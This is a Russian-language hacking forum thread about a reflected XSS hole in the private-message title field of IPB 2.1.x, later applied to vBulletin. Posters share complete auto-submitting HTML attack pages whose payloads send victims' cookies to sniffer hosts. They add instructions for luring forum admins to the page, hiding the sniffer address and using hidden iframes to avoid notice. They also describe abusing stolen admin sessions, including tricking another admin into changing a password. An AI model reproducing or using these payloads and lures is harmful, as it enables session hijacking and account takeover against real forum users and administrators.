Вот нашел сейчас пассивный хсс в ипб 2.1.7(на 2.1.4 тоже работает, на остальных не проверял).
При заполнении формы отправки лс, в графу "Заголовок сообщения" пишем:
">[xss_code]
напрмер:
"><script>alert();</script>
Жмём предварительный осмотр и вот наш алерт. Удачно использовать багу можно только через Passive Xss tools (предварительно его подправив), т.к. данные принимаются только чрез POST и стоит ограничение на 40 символов.

Passive-Xss-tool by DRON-ANARCHY (http://forum.antichat.ru/thread22898.html)
и
Passive xss tool by Dg-X (MySQL) (http://forum.antichat.ru/showpost.php?p=185816&postcount=12)

поясните - какой толк от этой дыры, если она работает только в Предварительном просмотре, при отправки мессаги, код не выполняется, а добавляется в заголовок как обычный текст?

Составь html ку... используй post
я спомощью такой XSS немало поимел!

а можно пример такой html - ки?

а можно пример такой html - ки?
Если я правильно понял, то должно быть что-то типа:

<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=windows-1251" />
</head>
<body onLoad="document.REPLIER.submit();">
<h3>Спасибо, сейчас вы будете перенаправлены</h3> <!-- Сюда можешь вставить любой текст или html код -->
<form action="http://---АДРЕС ФОРУМА---/index.php?act=msg" method="post" name="REPLIER"">
<input type="hidden" name="removeattachid" value="0" />
<input type="hidden" name="OID" value="" />
<input type="hidden" name="act" value="Msg" />
<input type="hidden" name="CODE" value="04" />
<input type="hidden" name="MODE" value="01" />
<input type="hidden" name="preview" value="Предварительный просмотр">
<input type="hidden" name="msg_title" value='"><script language="JavaScript">aa1 = new Image(); aa1.src="http://---ХОСТ НА КОТОРМ СНИФФЕР---/sniff.php"+document.cookie;</script>'>
</form>
</body>
</html>
Эту страницу размещаешь где-нибудь в сети, присылаешь на нее ссылку, когда юзер переходит по ней, он автоматически перенаправляется на целевой форум, потом при учете, что по кукисам он зарегенный пользователь( не зарегистрированным нельзя отправлять сообщения ) он попадает на страницу предварительного просмотра написанного сообщения в своем профиле, на которой выполнится JavaScript код, который отправит его куки твоему снифферу.

Passive XSS у меня так и не заработал, так что попытался тут кое-что свое замутить:

Типа скрипт, для юзания данной уязвимости. Инструкция по использованию:
1) Открываем файлик (ipbdeath.htm);
2) Вписываем туда, где указано АДРЕС ФОРУМА-ЖЕРТВЫ;
3) По желанию меняем адрес сниффера. По умолчанию <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
4) Изменяем АДРЕС, КУДА БУДЕТ РЕДИРЕКТИТЬСЯ ПОСЛЕ ОТПРАВКИ КУКИСОВ.
5) Выкладываем этот файлик где-нибудь (не забудьте переименовать, а то "ipbdeath.htm" о многом говорит :) )
6) Даем на него ссылку админу форума, лучше всего это делать на самом форуме: в топике или в PM.
7) Все, ждем результата на сниффере.

Принцип работы:
1) Пройдя по ссылке, админ попадает на нашу страничку, генерируется нужный POST-запрос. Далее админ автоматически редиректится на страницу отправки PM.
2) Скрипт срабатывает.
3) и страничка сразу редиректится туда, куда вы указали (лучше, думаю, указать на какой-нибудь топик форума, дабы тоже было меньше подозрений).

Принцип работы очень прост, постарался просто облегчить использование xss и немного уменьшить палевность. Еще, если форум закэширован, редиректы проскочут быстро, и можно не заметить особо.

В общем, жду отзывов, просьба ногами не пинать, я нубик пока :rolleyes:

IPB Death (http://ifolder.ru/675710)

Retscan
А скрипт то не пашет, сам пробывал исправить, ниче не вышло((( :(
Пришлось делать свое, сделано совсем по другому, что бы усыпить бдительность жертвы, так как не ламер может понять что ему подсунули.Сделал просто напросто фишку под страницу ошибки на narod.ru , чел заходит, а яему ошибку и пишет что сейчас будет перемещен обратно. Но он может все таки просмотреть хтмл код, дык так как я не знаю как закодирывать адресс снифака советую сунуть его в глубь, что б если и просмотрел хтмл код, до него не добрался.
Ну и естественно надо файл кидать на народ, и не забудьте его отредактирывать!
Файлик (http://ifolder.ru/941093)

Бред, не пройдет, т.к. кукисы будут отправляться именно того сервера, где находится твой скрипт =)

Думаешь я б его выложил есле б не тестил??
тем более ты принцип не понял.Щас обЪясню

Скачали файлик, ложим его на свой домен на народе
акк.народ.ру/файл.хтм
и даем админу на форуме, он заходит на сам файл а не на страницу ошибки, сама страница уже вписана в тот файл

вопрос народ можети доделать первую html ку так чтобы она вписывала ник кому отправляется ПМ?

Добавь в ту html:


<input type="hidden" name="entered_name" value="Nick">

HiM@S-_']Там есть еще через модера Xss

А с этого момента по подробней можно?)

ну хз... я так обчно делал...

сорри время мало неуспел всё обрезать...
короче тестим ;)

<html>
<body onload="p.submit()">
<FORM id=p name=REPLIER action=http://forum.xxx.xx/index.php?act=msg method=post>
<INPUT type=hidden value=0 name=removeattachid>
<INPUT type=hidden name=OID>
<INPUT type=hidden value=Msg name=act>
<INPUT type=hidden value=04 name=CODE>
<INPUT type=hidden value=01 name=MODE>

<INPUT type=hidden id=entered_name value="HAPPY" name=entered_name autocomplete="off">
<BR>
<INPUT type=hidden tabIndex=3 maxLength=40 value='"><script>navigate("http://XXXXXXX/sniffer.gif?".concat(document.cookie))</script>' size=40 name=msg_title></textarea></form>

_GaLs_
точно не помню....
но смысл такой....

у модера или админа есть функция изменить данные юзера...
и там при изменении даты рождения поле не фильтруется

А ещё если я не ошибаюсь ,то можно код выше разместить на ifolder.ru как шапку и на форум выложить ссылку на файл который расположен на ifolder. Ток чёт куки на приходят на лог.
Зарегистрировать акк можно здесь (http://agava.ru/partners)
Ток надо я думаю надо убрать перенаправление в скрипте.

Лучше впаривать ссылку на страницу такого типа
<html>
<body>
здесь любой контент
<iframe width=0 height=0 frameborder=0 src="frame.htm">
</body>
</html>
А все "подозрительные" действия совершать во фрейме
<html>
<body>
<form name="xss" action="http://test1.ru/ipb217/index.php" method="post">
<input type="hidden" name="act" value="Msg">
<input type="hidden" name="CODE" value="04">
<input type="hidden" name="MODE" value="01">
<input type="hidden" name="msg_title" value='"><script>document.location.href="http://test2.ru/xss/s.php?"+document.cookie;</script>'>
<script language=javascript>xss.submit()</script>
</form>
</body>
</html>
Как на видео с ДЛ

_http://rapidshare.com/files/16889954/IPB_217_XSS.rar.html
пасс: dl

да и еще как узнать версию форума qwerty очень подозрительно то что к примеру чтобы узнать версию 2.1.* надо прописать путь до файла info.php я прописываю в qwerty ну в форуме естесно он мне пишет типа пожалуйста подождите форум загружается и потом главная страница форума,это что означает что файл присутсвует??И как узнать что это точно версия 221???

да и еще как узнать версию форума qwerty очень подозрительно то что к примеру чтобы узнать версию 2.1.* надо прописать путь до файла info.php я прописываю в qwerty ну в форуме естесно он мне пишет типа пожалуйста подождите форум загружается и потом главная страница форума,это что означает что файл присутсвует??И как узнать что это точно версия 221???
Попробуй в java-скриптах поглядеть, я обычно там всегда версию находил (но не всегда она там правельная)
Вот в Античате я думаю версия не правильная:)
/*================================================= =====================*\
|| ################################################## ################## ||
|| # vBulletin 3.0.6
|| # ---------------------------------------------------------------- # ||
|| # Copyright ©2000–2005 Jelsoft Enterprises Ltd. All Rights Reserved. ||
|| # This file may not be redistributed in whole or significant part. # ||
|| # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # ||
|| # http://www.vbulletin.com | http://www.vbulletin.com/license.html # ||
|| ############################[DGT-TEAM]############################## ||
\*================================================ ======================*/

У меня получилось провернуть это на vbulletin 3.0.5. Спасибо dl и spheere за идею :)
Принцип тот же, вставляем ксс в поле "тема".
Дело в том, что на vbull скрипт срабатывал при нажатии кнопки"предварительный просмотр". Поэтому вместо form.submit() следует использовать
preview = document.getElementById("pre"); preview.click();
Естественно, предварительно добавив атрибут id кнопке предпросмотра.

dante
Вариантов много... Можно просто залогиниться и почитать закрытые разделы, побанить кого-нубдь =) ... Можно взять и написать другому админу (если таковой есть) : "Так, мол, так... Пароль забыл, по кукисам все время логинит, а ща вот решил мыло сменить, так пароль требуют... Смени мне его плз на Idin@h=) "
И так далее ;)

------------------------------------------------------------------

Grey: тема закрыта, все сообщения не имеющие информационной ценности удалены, ссылка на тему добавлена в тему [Обзор уязвимостей Ipb].